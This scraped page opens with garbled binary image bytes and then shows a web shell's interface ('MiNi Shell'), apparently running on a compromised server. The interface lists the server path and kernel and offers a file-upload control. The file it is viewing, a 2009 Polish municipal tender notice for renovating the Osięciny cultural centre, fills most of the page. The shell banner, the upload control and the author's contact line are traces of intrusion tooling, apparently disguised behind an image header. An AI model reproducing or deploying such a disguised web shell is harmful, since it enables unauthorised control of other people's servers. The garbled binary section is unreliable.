JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/228816-N-2009.html

<p class="kh_header"><b>Osięciny: REMONT I PRZEBUDOWA GMINNEGO OŚRODKA KULTURY W OSIĘCINACH</b><br>
<b>Numer ogłoszenia: 228816 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osięciny , ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, woj. kujawsko-pomorskie, tel. 054 2650030, 2650034, faks 054 2650185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ug-osieciny.samorzady.pl//; www.osieciny.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT I PRZEBUDOWA GMINNEGO OŚRODKA KULTURY W OSIĘCINACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy REMONTU I PRZEBUDOWY GMINNEGO OŚRODKA KULTURY       W OSIĘCINACH

 Zakres rzeczowy obejmuje:
a) Roboty w zakresie stolarki budowlanej    
b) Wykonywanie pokryć dachowych
c) Izolacja cieplna    
d) Roboty murarskie w zakresie fasad     
e) Roboty wykończeniowe w zakresie obiektów budowlanych     
f) Roboty w zakresie burzenia
    
OPIS SZCZEGÓŁOWY MATERIAŁOWO-KONSRUKCYJNY 
Budynek główny:
1. ŚCIANY  ZEWNĘTRZNE                
- ściany fundamentowe: izolacja styropianem ekstradowanym gr. 6 cm
- ściany zewnętrzne,nadziemia: gr. 38 cm,1-warstwowe, docieplić styropianem gr.  12 cm metodą lekką ATLAS

2. STROPODACH WYSOKI
- stropodach nie wentylowany z płyt korytkowych
WARSTWY PROJEKTOWANE (od góry, po zdjęciu warstw wierzchnich do gołych płyt korytkowych):
- papa nawierzchniowa - POLBIT WF - 250-4000
- papa podkładowa - ZDUNBIT PF - 180-3000
- izolacja termiczna - styropian PWS -A1 lub PWS - A2 GR. 18 CM
- paraizolacja bitumiczna - ALBIT AL. S40
- istniejące płyty korytkowe zagruntowane na nowo (po usunięciu luźnych fragmentów istniejącej gładzi cementowej)
- asfaltowa emulsja anionowa

3. STROPODACHY NIŻSZE
- stropodach nie wentylowany na płytach kanałowych
  WARSTWY PROJEKTOWANE (od góry, po zdjęciu wierzchnich warstw do gołych płyt kanałowych):
- papa nawierzchniowa - POLBIT WF - 250-4000
-  papa podkładowa - ZDUNBIT PF - 180-3000
- izolacja termiczna - styropian PWS - A1 lub PWS -A2 gr. 18 cm
- paraizolacja bitumiczna - ALBIT AL. S40
- strop kanałowy gr. 24 cm zagruntowany na nowo (po usunięciu luźnych elementów istniejącej gładzi)
- asfaltowa emulsja anionowa

4. OBRÓBKI BLACHARSKIE I POZOSTAŁE ELEMENTY  ZABEZPIECZENIA  KRAWĘDZI
    Wszystkie krawędzie wykończyć wg przedstawionych rysunków szczegółowych oraz dodatkowych rysunków obranego systemu. Elementy drewniane (przekroje krawędziaków) dostosować do konkretnych miejsc na dachu, zamocować w wieńcach lub podciągach żelbetowych za pomocą kołków rozprężnych HILTI.
Obróbki blacharskie z blachy stalowej ocynk. gr. 0,6 mm powlekanej w kolorze grafitowym. Rynny i rury spustowe z PCV w kolorze grafitowym.

5. STOLARKA  OKIEN I DRZWI, PARAPETY.
- okna z PCV (białe) z rozszczelnieniem
- parapety wewnętrzne z PCV (białe)
- parapety zewnętrzne stalowe powlekane w kolorze grafitowym
- drzwi zewnętrzne z  ALUMINIUM (białe)

6. KOLORYSTYKA  ELEWACJI, ZMIANY W OBRĘBIE WEJŚCIA GŁÓWNEGO
   Metoda lekka termomodernizacji elewacji oraz względy ekonomiczne wymusiły przyjęcie zasadniczych płaszczyzn fasady w technice tynków cienkowarstwowych mineralnych. Kolorystyka elewacji zaprojektowana została  w sposób powściągliwy, jednocześnie dostosowana do rangi i charakteru obiektu Gminnego Ośrodka Kultury w małej miejscowości gminnej.
   Rozczłonkowana bryła obiektu sprowokowała do zastosowania maksymalnie trzech kolorów: dwóch odcieni popielu oraz kontrastowego koloru rdzawego (w mniejszości płaszczyzn).
   Dla uzyskania lepszego efektu elewacji zaproponowano wprowadzenie dodatkowego materiału na dwie ściany szczytowe (najwyższe), jakim jest blacha falista stalowa powlekana w kolorze srebrnym (metalik)  lub blacha falista aluminowa.
   W ramach zmian w obrębie wejścia głównego proponuje się zastosowanie ażurowej przesłony (RASTRA) z elementów aluminowych - rurek O 20 w odstępach co 10 cm w celu zmniejszenia wrażenia nadmiernej wysokości zadaszenia. Raster wys. ok. 1,0 m zamocować  od spodu zadaszenia oraz ściany bocznej i słupa zewnętrznego.
    Wymienić barierkę podjazdu dla NPS (po wyremontowaniu całego obiektu obecna balustrada  stalowa nie przystawała by do całości). Zaleca się zastosować barierkę ze stali kwasoodpornej (mat). W podobną barierkę wyposażyć  pozostawioną rampę (przy wejściu do zaplecza kawiarni). 
        
7. PRACE ROZBIÓRKOWE:
- demontaż dwóch ramp zewnętrznych
- demontaż wskazanych okien i drzwi zewnętrznych
- demontaż zużytych obróbek blacharskich, rynien i rur spustowych
- demontaż wierzchnich warstw dachów

8. OGÓLNY OPIS PRAC REMONTOWYCH
     Z uwagi na przebudowę (remont kapitalny) elewacji oraz niektóre nowe otwory, należy wykonać bądź zamurowanie części otworów lub wykonanie nowego okna/ przeniesienie okna ze ściany  zachodniej na południową przy zastosowaniu nadproża stalowego z dwuteownika 2T 180.
      Zbędne otwory zostaną zamurowane.
      Szczególną uwagę należy zwrócić na stan techniczny stropodachu, bowiem na obecnym etapie projektant nie miał możliwości wykonania dogłębnej oceny. 
     Po usunięciu warstw wierzchnich stropodachu stwierdzić miejsca Ew. przecieków, oczyścić i wyrównać strop, ułożyć warstwy izolacji termicznej i przeciwwilgociowej wg rys. szeczgół.
     Renowacja elewacji przewiduje malowanie farbą fasadową  silikatową wg wzornika CAPAROL.

9. POZOSTAŁE PRACE  REMONTOWO-BUDOWLANE
miejsca po zlikwidowanych rampach wykorzystac na urządzenie gazonów z zielenią ozdobną
miejsca wsypu opału obnizyć do wys. krawęźnika gazonów, wymienić pokrywę wsypu (stalowa malowana proszkowo w kolorze grafitowym).
zabezpieczyć istniej. kominy wentylacyjne w czapki betonowe lub stalowe 
wszelkie elementy stalowe istniejące (np. czerpnie Sali widowiskowej ) pomalować farbą do metalu po uprzednim oczyszczeniu szczotkami stalowymi - farba w kolorze grafitowym 
Zgodnie z ustawą Prawo Zamówień Publicznych art. 29 ust. 3 - Wykonawca ma prawo zastosować każdy inny równoważny wyrób.

Szczegółowy zakres robót ujęty jest w projekcie budowlanym oraz w przedmiarze robót stanowiącej załącznik do niniejszej siwz.
 Zamówienie poniżej 5 150 000 euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 25.23.41.00-1, 45.42.10.00-4, 45.26.12.10-9, 45.32.10.00-3, 45.26.25.21-9, 45.40.00.00-1, 45.11.11.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 13.200,00 zł
 (słownie: Trzynaście tysięcy dwieście złotych 00-100)

 1) Wadium może być wniesione w następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z  tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm)
   2)  Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy  Urzędu Gminy Osięciny KDBS Oddział Osięciny 72 9550 0003 2002 0000 0101 0002 
 z dopiskiem na blankiecie przelewu wadium na zabezpieczenie oferty przetargowej - REMONT I PRZEBUDOWA GMINNEGO OŚRODKA KULTURY W OSIĘCINACH.
          Kopię dowodu przelewu potwierdzoną  za zgodność  z oryginałem należy dołączyć do oferty. 
    3) Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniu pieniężnym SKOK lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed­siębiorczości, należy w formie nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a  kopię  potwierdzoną za zgodność z oryginałem załączyć do oferty.
4)  Wadium należy wnieść przed upływem terminu składania ofert. tj. do dnia  30.07.2009r. do godz. 9:00.
5) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie  zaliczone na rachunku bankowym Zamawiającego.
6)  Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają  obowiązek  posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem    technicznym i osobami zdolnymi do  wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych  do wykonania zamówienia:
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie     zamówienia; 
4)  nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 ustawy PZP
5) akceptują warunki określone w SIWZ

   Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału   w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że wyżej wymienione warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) oświadczenie oferenta, że nie podlega wykluczeniu na podst. art. 24 ust. 1 i 2 i spełnia wymagania   określone w art. 22 ust. 1 ustawy - Prawo zamówień  publicznych  (Dz. U. z 2007 r. Nr 223, poz. 1655,  z późniejszymi zmianami) stanowiące załącznik nr 2 do specyfikacji; 

b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie  wcześniej niż 6 miesięcy przed upływem terminu składania  ofert;     
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz  właściwego  oddziału ZUS  lub   KRUS potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
d) wykaz wykonanych w okresie ostatnich pięciu lat, (a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie) robót budowlanych (minimum dwóch), odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie- według załącznika nr 4 do niniejszej SIWZ;
e) informacje na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu    kierowniczego w   okresie ostatnich trzech lat, w przypadku gdy okres działalności jest krótszy - w tym okresie, według
załącznika nr 5 niniejszej SIWZ;
f) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć   w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie  czynności - według załącznika nr 6 do niniejszej SIWZ;
g) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w   wykazie, o którym mowa w pkt f), wykonawca wskazał osoby, którymi będzie dysponował;
h) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie  w funkcji kierownika budowy, posiadają wymagane uprawnienia zgodnie z obowiązującymi przepisami Prawa budowlanego oraz należą   do właściwej izby samorządu zawodowego, np. Izby Inżynierów Budownictwa;
i) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje  lub będzie   dysponował wykonawca - według załącznika  nr 7 do niniejszej SIWZ.
j) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia  narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt i), wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
k) polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
l) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert;
m) aktualna informacja z Krajowego Rejestru Karnego określona w art. 24 ust. 1 pkt 9 ustawy wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert;
n) dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-osieciny.samorzady.pl//.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14, 88-220 Osięciny, pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14, sekretariat- pokój nr 19, II piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com